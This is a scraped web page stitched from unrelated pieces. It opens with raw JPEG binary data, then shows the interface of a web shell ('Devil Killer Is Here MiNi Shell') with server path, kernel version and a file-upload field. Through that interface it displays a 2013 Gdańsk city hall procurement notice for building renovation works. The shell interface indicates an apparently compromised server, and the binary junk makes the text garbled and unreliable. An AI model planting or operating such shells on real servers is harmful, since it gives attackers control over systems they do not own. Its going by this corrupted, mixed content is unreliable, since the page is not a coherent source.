JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131219/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131219/276689-N-2013.html

<p class="kh_header"><b>Gdańsk: Wykonanie robót remontowych wybranych pomieszczeń piwnicznych skrzydła A oraz parteru skrzydła A i B w budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12</b><br>
<b>Numer ogłoszenia: 276689 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Gdańsk Urząd Miejski w Gdańsku , ul. Nowe Ogrody 8/12, 80-803 Gdańsk, woj. pomorskie, tel. 58 3236129, faks 58 3236529.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót remontowych wybranych pomieszczeń piwnicznych skrzydła A oraz parteru skrzydła A i B w budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontu wybranych pomieszczeń piwnicznych skrzydła A oraz parteru skrzydła A i B w budynku Urzędu Miejskiego w Gdańsku przy ul. Nowe Ogrody 8/12.<br>
2. Zakres rzeczowy robót obejmuje:<br>
Wykonanie robót remontowych następujących elementów budynku:<br>
Etap I Remont pomieszczeń na poziomie piwnic (pomieszczenia, węzeł sanitarny i korytarz -wejście od strony klatki K-3; magazyn wejście H; pomieszczenia, klatka schodowa i holl przy bufecie - wejście od klatki K-4):<br>
2.1.1 Roboty przygotowawcze i demontażowe w poziomie piwnic<br>
2.1.2 Roboty murowe - wc z natryskiem - poziom piwnic<br>
2.1.3 Roboty odgrzybieniowe pomieszczeń piwnicznych<br>
2.1.4 Izolacja przeciwwilgociowa pomieszczeń piwnicznych<br>
2.1.5 Roboty tynkarskie - tynki renowacyjne pomieszczeń piwnicznych<br>
2.1.6 Roboty malarskie pomieszczeń piwnicznych<br>
2.1.7 Roboty okładzinowe ścian, posadzek i sufitów pom. piwnicznych<br>
2.1.8 Roboty w pomieszczeniu sanitarnym: roboty instalacji sanitarnej w tym instalacja wentylacji, roboty budowlane w tym wymiana stolarki drzwiowej i kabiny, roboty instalacji elektrycznej, elementy wyposażenia<br>
2.1.9 Roboty remontowe klatki schodowej i hollu przy bufecie: roboty demontażowe i przygotowawcze, roboty okładzinowe ścian, sufitu i posadzkowe, roboty malarskie, roboty elektryczne<br>
Etap II Remont korytarza i hollu B w poziomie parteru<br>
2.2.1 Roboty przygotowawcze i demontażowe hollu B i korytarza B<br>
2.2.2 Roboty okładzinowe ścian, sufitu i posadzkowe - holl B i korytarz B<br>
2.2.3 Wymiana stolarki drzwiowej z opaskami i obudową ościeży<br>
2.2.4 Roboty malarskie - holl B, korytarz B<br>
2.2.5 Roboty elektryczne - korytarz B  i holl B<br>
Etap III Remont Sali Obsługi Mieszkańców wraz z węzłem sanitarnym w poziomie parteru<br>
2.3.1 Roboty przygotowawcze i demontażowe<br>
2.3.2 Roboty okładzinowe ścian i sufitu<br>
2.3.3 Roboty malarskie - sala obsług mieszkańców<br>
2.3.4 Roboty elektryczne sali obsługi mieszkańców<br>
2.3.5 Roboty budowlane: roboty demontażowe, licowanie ścian, posadzki (węzeł sanitarny)<br>
2.3.6 Wymiana stolarki drzwiowej (węzeł sanitarny)<br>
2.3.7 Instalacje sanitarne: demontaże, montaż nowych urządzeń (węzeł sanitarny)<br>
2.3.8 Wentylacja mechaniczna (węzeł sanitarny)<br>
2.3.9 Instalacja elektryczna (węzeł sanitarny)<br>
2.3.10 Elementy wyposażenia (węzeł sanitarny)<br>
Etap IV Remont hollu i wejść do budynku (przedsionki) A w poziomie parteru<br>
2.4.1 Roboty przygotowawcze i demontażowe<br>
2.4.2 Roboty okładzinowe ścian, sufitu i posadzki - holl A<br>
2.4.3 Roboty malarskie - holl A oraz przedsionki<br>
2.4.4 Roboty elektryczne - holl A  oraz przedsionki<br>
Etap V Remont korytarza przy banku wraz z węzłem sanitarnym w poziomie parteru<br>
2.5.1 Roboty przygotowawcze i demontażowe<br>
2.5.2 Wymiana stolarki drzwiowej z opaskami i obudową ościeży<br>
2.5.3 Roboty okładzinowe ścian i sufitu - korytarz przy banku<br>
2.5.4 Roboty elektryczne - korytarz przy banku<br>
2.5.5 Węzeł sanitarny przy centrali telefonicznej - roboty instalacji sanitarnej w tym wymiana grzejnika co., instalacji elektrycznej, wymiana stolarki drzwiowej oraz uzupełnienie okładzin ściennych<br>
Etap VI Wymiana wyznaczonej stolarki na wszystkich kondygnacjach budynku<br>
2.6.1 Wymiana stolarki <br>
2.6.2 Roboty malarskie związane z wymianą stolarki drzwiowej<br>
WAŻNA INFORMACJA:<br>
Ze względu na specyfikę przedmiotu zamówienia Zamawiający zastrzega, że podwykonawcom nie mogą być powierzone następujące części zamówienia:
- roboty okładzinowe ścian, sufitów i posadzek.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania obowiązany jest przed upływem terminu składania ofert, do wniesienia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty:<br>
a) co najmniej 1 robotę budowlaną, w czynnym obiekcie użyteczności publicznej, w ramach której wykonał remont wykończeniowy wewnętrzny o wartości nie mniejszej niż 300.000,00 zł brutto <br>
oraz <br>
b) co najmniej 1 robotę okładzinową, o wartości brutto nie mniejszej niż 50.000,00 zł, związaną z wykończeniem ścian wewnętrznych obudowanych laminatami, deskami boazeryjnymi, panelami ściennymi itd. (nie dotyczy zabudowy w technologii płyt gipsowo-kartonowych) .<br>
Za remont wykończeniowy wewnętrzny Zamawiający rozumie wykonanie: robót malarskich, tynków, posadzek, okładzin i oblicowań ścian i sufitów wewnętrznych, montaż drzwi wewnętrznych oraz elementów wbudowanych, jak również wykonanie ścian działowych w technologiach suchych.<br>
Za wykazanie należytego wykonania powyższych 2 robót Wykonawca otrzyma 0 pkt. <br>
Za wykazanie należytego wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, każdej kolejnej roboty budowlanej, w czynnym obiekcie użyteczności publicznej, w ramach której Wykonawca wykonał remont wykończeniowy wewnętrzny o wartości brutto nie mniejszej niż 300 000 zł - Wykonawca otrzyma każdorazowo dodatkowy 1 pkt.<br>
Za wykazanie należytego wykonania, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, każdej kolejnej roboty okładzinowej, o wartości brutto nie mniejszej niż 50.000,00 zł, związanej z wykończeniem ścian wewnętrznych obudowanych laminatami, deskami boazeryjnymi, panelami ściennymi itd. (nie dotyczy zabudowy w technologii płyt gipsowo-kartonowych) Wykonawca otrzyma każdorazowo dodatkowe 3 pkt.<br>
W przypadku, gdy Wykonawca wykaże spełnienie warunku wiedzy i doświadczenia w stopniu wyższym niż minimalny poprzez powołanie się na potencjał innych podmiotów, w takiej sytuacji Zamawiający uzna, że Wykonawca spełnia warunek wiedzy i doświadczenia jedynie w minimalnym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia:<br>
a) kierownikiem budowy - posiadającym uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej;<br>
b) kierownikiem robót sanitarnych - posiadającym uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie instalacji wodociągowych i kanalizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że 	posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 300 000,00 PLN (słownie: trzysta tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zaproszeni do złożenia ofert zostaną Wykonawcy z największą ilością punktów.<br>
W przypadku uzyskania takiej samej ilości punktów przez większą liczbę Wykonawców o kolejności w rankingu decydować będzie zsumowana wartość brutto wykonanych robót okładzinowych.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. ZAMAWIAJĄCY przewiduje możliwość dokonywania zmian postanowień zawartej umowy, które mogą  dotyczyć:<br>
1) terminu realizacji zamówienia;<br>
2) wynagrodzenia; <br>
3) warunków płatności;<br>
4) rachunku bankowego WYKONAWCY.<br>
2.  Zmiany, o których mowa w ust. 1  mogą nastąpić w następujących sytuacjach:<br>
1)   zmiana terminu wykonania przedmiotu umowy może nastąpić w przypadku wystąpienia siły wyższej, pod warunkiem, że Wykonawca powiadomi na piśmie Zamawiającego o wystąpieniu zdarzenia siły wyższej nie później aniżeli w ciągu 2 dni od dnia w/w zdarzenia. Przesunięcie terminu następuje o ilość dni, w których zdarzenie siły wyższej wystąpiło;<br> 
2) zmiana wynagrodzenia i warunków płatności może nastąpić w przypadku zmiany stawki podatku od towarów i usług na dzień wystawienia faktury w stosunku do stawki obowiązującej w dniu podpisania umowy;<br>
3) zmiany rachunku bankowego WYKONAWCY;<br>
4) gdy zmiany są korzystne dla Zamawiającego.<br>
3. Oprócz przypadków określonych w ust. 2 zmiana terminu realizacji przedmiotu umowy może nastąpić w przypadku wystąpienia okoliczności niezależnych od WYKONAWCY, w szczególności:<br>
1)  zawarcia umowy na roboty dodatkowe (przedłużenie terminu możliwe będzie wyłącznie o czas niezbędny do realizacji tych robót); <br>
2) wystąpienia przerw w realizacji przedmiotu umowy z winy ZAMAWIAJĄCEGO o okres dłuższy niż 7 dni (łącznie). Wydłużenie terminu nastąpi o faktyczną ilość dni przerw w realizacji zadania pomniejszoną o 7 dni;<br>
3) w innych przypadkach, których nie można było przewidzieć a leżących po stronie ZAMAWIAJĄCEGO.<br>
4. Zmiany do umowy następują na pisemny wniosek jednej ze stron wraz z uzasadnieniem  konieczności wprowadzenia tych zmian.<br>  
5. Zmiany umowy wymagają dla zachowania swojej ważności formy pisemnej w postaci aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja Istotnych Warunków Zamówienia (SIWZ) zostanie przekazana Wykonawcom zgodnie z art. 51 ust. 4 ustawy Prawo zamówień publicznych wraz z zaproszeniem do składania ofert.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2014 godzina 12:00, miejsce: Urząd Miejski w Gdańsku, ul. Nowe Ogrody 8/12, 80-803 Gdańsk, BIURO ZAMÓWIEŃ PUBLICZNYCH pokój 129 (I piętro) lub przesłać pocztą z wyraźnym oznaczeniem postępowania.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej.<br>
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając mu w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w oryginale).<br>
Jednak Zamawiający zastrzega, że w przypadku oceny spełniania przez Wykonawców warunku wiedzy i doświadczenia - w przypadku, gdy Wykonawca wykaże spełnienie warunku wiedzy i doświadczenia w stopniu wyższym niż minimalny poprzez powołanie się na potencjał innych podmiotów, w takiej sytuacji Zamawiający uzna, że Wykonawca spełnia warunek wiedzy i doświadczenia jedynie w minimalnym zakresie. <br>
3. Dokumenty, wymienione w punkcie III.4) ogłoszenia, należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 roku, poz. 231). <br>
Uwaga: oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 Ustawy oraz informację o tym, że wykonawca nie należy do grupy kapitałowej - należy złożyć w oryginale!<br>
4. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia załączniki nr 5 i 6 oraz aktualny odpis z właściwego rejestru - muszą być złożone oddzielnie przez każdego z tych Wykonawców.<br>
5. Wykonawcy występujący wspólnie.<br>
1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br>
2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego dla ustanowionego przez nich pełnomocnika. Pełnomocnictwo winno zostać złożone w oryginale lub kopii potwierdzonej notarialnie. <br>
3) Wykonawcy, o których mowa w pkt 1, ponoszą solidarną odpowiedzialność za wniesienie zabezpieczenia należytego wykonania umowy i wykonanie umowy.<br>
4) Zamawiający informuje, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, odpowiednio:<br>
a) warunki, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych muszą zostać spełnione łącznie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br>
b) wykazanie braku podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych musi zostać wykazane przez każdego z Wykonawców ubiegającego się wspólnie o udzielenie zamówienia.<br>
6. Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim, z zachowaniem formy pisemnej.<br>
7. Oświadczenia, wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie, faksem lub drogą elektroniczną z zastrzeżeniem ust. 8.<br>
8. Forma pisemna zastrzeżona jest dla złożenia oferty oraz wniosku o dopuszczenie do udziału w postępowaniu wraz z załącznikami, w tym oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego oraz pełnomocnictwa.<br>
9. Osobą uprawnioną do kontaktowania się z Wykonawcami jest pracownik Biura Zamówień Publicznych Urzędu Miejskiego w Gdańsku - Monika Wilczyńska, pok. 127, tel. (58) 32-36-127, faks (58) 32-36-529, e-mail: monika.wilczynska@gdansk.gda.pl, w dniach: pon., wt., czw. - w godzinach od 8:00 do 16:00; w śr. - w godzinach od 8:00 do 17:00, w pt. - w godzinach od 8.00 do 15.00.<br>
10. Sygnatura postępowania: BZP-271-115/WKiO/13/MW.<br>
11. WAŻNE!!!<br>
Ze względu na specyfikę przedmiotu zamówienia Zamawiający zastrzega, że podwykonawcom nie mogą być powierzone następujące części zamówienia 
- roboty okładzinowe ścian, sufitów i posadzek.<br>
12. Przed zawarciem umowy Wykonawca będzie zobowiązany przekazać Zamawiającemu:<br>
a) kopię uprawnień zawodowych osób, które będą brały udział w realizacji zamówienia wraz z zaświadczeniem z właściwej izby samorządu zawodowego potwierdzającym wpis na listę członków (z określonym w nim terminem ważności) oraz kopią aktualnego wymaganego ubezpieczenia OC,<br>
b) Harmonogram Robót i Płatności,<br>
c) kopię polisy ubezpieczenia od odpowiedzialności cywilnej (deliktowej i kontraktowej) na kwotę nie mniejszą niż 2 000 000,00 złotych (słownie: dwa miliony złotych) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, oraz do przedstawienia dowodu jej opłacenia,<br>
d) Plan Bezpieczeństwa i Ochrony Zdrowia.<br>
13. W przypadku wyboru jako oferty najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy przed podpisaniem umowy o zamówienie publiczne przedłożyć Zamawiającemu umowę regulującą współpracę tych Wykonawców.<br>
14. Zaleca się, aby umowa konsorcjum regulująca współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia w szczególności zawierała postanowienia wynikające z charakteru konsorcjum:<br>
1) określenie stron umowy z oznaczeniem lidera konsorcjum,<br>
